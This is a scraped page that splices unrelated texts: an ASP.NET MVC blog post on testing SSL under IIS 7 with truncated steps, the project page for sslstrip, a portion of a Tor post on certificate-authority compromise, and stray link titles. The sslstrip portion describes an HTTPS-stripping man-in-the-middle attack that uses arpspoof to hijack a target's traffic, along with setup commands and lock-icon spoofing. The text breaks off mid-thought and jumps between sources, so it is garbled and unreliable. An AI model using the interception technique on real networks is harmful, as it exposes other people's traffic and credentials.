Better, Faster, Easier SSL testing for ASP.NET MVC & WebForms - Ricka on MVC and related Web Technologies. ScottHa has a great blog Working with SSL at Development Time is easier with IISExpress, but I’ve got what I think is a better approach. Please weigh in. In this blog entry I’ll show you how to test SSL on your ASP.NET MVC & WebForms applications using IIS 7.
You should make sure you have IIS 7 set up on your Windows 7 computer before proceeding. See my blog Test your ASP.NET MVC or WebForms Application on IIS 7 in 30 seconds for instructions. Create a new ASP.NET MVC 3 Application called MvcSSL in the C:\Webs folder. Accept all the defaults. WARNING: IIS cannot run an ASP.NET project that has been created in the default Visual Studio project folder (C:\users\<user>\Documents\Visual Studio 2010\Projects). Build and run the application. Right click the solution and select Properties. Select Web in the left pane. Should you get the message: Unable to create the virtual directory. Read it and follow the directions and you’ll be rewarded with a friendlier message. That’s it. Next Steps. Software >> sslstrip. This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.
It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below. Requirements Python >= 2.5 (apt-get install python) The python "twisted-web" module (apt-get install python-twisted-web) Setup tar zxvf sslstrip-0.9.tar.gz cd sslstrip-0.9 (optional) sudo python . Running sslstrip That should do it. How does this work? First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. At this point, sslstrip receives the traffic and does its magic. Development The current development branch can be found on github. Detecting Certificate Authority compromises and web browser collusion.
Thanks to Ian Gallagher, Seth Schoen, Jesse Burns, Chris Palmer, and other anonymous birds for their invaluable feedback on this writeup. The Tor Project has long understood that the certification authority (CA) model of trust on the internet is susceptible to various methods of compromise. Without strong anonymity, the ability to perform targeted attacks with the blessing of a CA key is serious. In the past, I’ve worked on attacks relating to SSL/TLS trust models and for quite some time, I’ve hunted for evidence of non-academic CA compromise in the wild. I’ve also looked for special kinds of cooperation between CAs and browsers. Proof of collusion will give us facts. It will also give us a real understanding of the faith placed in the strength of the underlying systems. Does certificate revocation really work? I watch the Chromium and Mozilla Firefox projects carefully, because they are so important to the internet infrastructure.
A comment marks the first as "Not a real certificate. HTTP Web Services - Dive Into Python 3. Httplib2 - Project Hosting on Google Code.